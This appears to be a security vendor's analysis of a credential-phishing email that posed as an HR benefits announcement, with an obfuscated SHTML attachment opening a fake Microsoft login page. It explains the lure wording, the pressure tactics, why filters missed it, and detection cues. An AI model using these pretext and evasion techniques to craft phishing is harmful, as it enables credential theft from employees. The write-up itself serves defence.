In this attack, the initial email posed as an internal company announcement from the human resources department about the release of information regarding a new employee benefit package. The message stated that the new benefit package was available for review and the recipient was asked to review the policy changes in an attached file named “Employee Docs.shtml.” 

To pressure action, the message indicated the recipient must immediately sign the attached document to acknowledge that they’ve reviewed the new handbook. Included in the email was an otherwise unnecessary sentence used to increase credibility that said, “The purpose of this policy is to maintain a compensation philosophy that is competitive and financially responsible while supporting service delivery, recruitment and retention of employees at [company name]

The email was sent from a likely compromised external account unrelated to the target organization. The sender’s display name was set to the name of the target company rather than an employee, which made the message look like it was generated by an automated internal system.

Status Bar Dots
Benefit Package Credential Phishing Email

Had the recipient opened the attached file, a local copy of a phishing page that mimicked a Microsoft login page would have been opened in their browser and pre-populated with their company email address. The login prompt included a message stating that because the recipient was accessing sensitive information, they needed to verify their account password to authenticate their identity. The source code of the SHTML attachment was obfuscated with JavaScript to prevent easy analysis of the file.

Status Bar Dots
Benefit Package Credential Phishing Page
Status Bar Dots
Obfuscated Phishing Attachment Code

How Does This Attack Bypass Email Defenses?

Because this email was sent from a legitimate account that has been compromised without a history of abuse, there are no direct signals indicating the email’s origin is malicious. IOCs associated with the HTML attachment, such as file hash, had not been previously detected as malicious, allowing it to bypass traditional tools that rely on known bad indicators. Because the files associated with this attack contained source code that had been obfuscated, an analysis of the file to identify malicious artifacts, such as URLs, could not be performed.

How Can This Attack Be Detected?

The sender’s display name resembled a human resources account; however, the email address had never been used to communicate with employees at the company. The use of obfuscated source code is a common tactic in phishing attacks. Additionally, an in-depth analysis of files, rather than simply scanning raw source code, could result in the identification of malicious artifacts. HTML attachments are commonly used to deliver phishing payloads without having to include the malicious content in the email itself.

What are the Risks of This Attack?

The theme of this email–a human resources announcement–may result in a higher success rate since it will likely be of greater interest to targeted employees. The email also included a direct request for the recipient to review and sign the attached document. Direct requests, rather than passive comments, are generally more effective to get a target to perform a desired action. If an employee entered credentials into the phishing page, attackers would have full access to their email account, which they can then use to look for sensitive information or as a launch point for other attacks on the employee’s coworkers, customers, or vendors.

Analysis Overview

Vector

Payload-based

Goal

Credential Theft

Tactic

External Compromised Account
File Source Code Obfuscation

Theme

Fake Document
Human Resources Announcement

Impersonated Party

Internal System

See How Abnormal Stops Emerging Attacks

See a Demo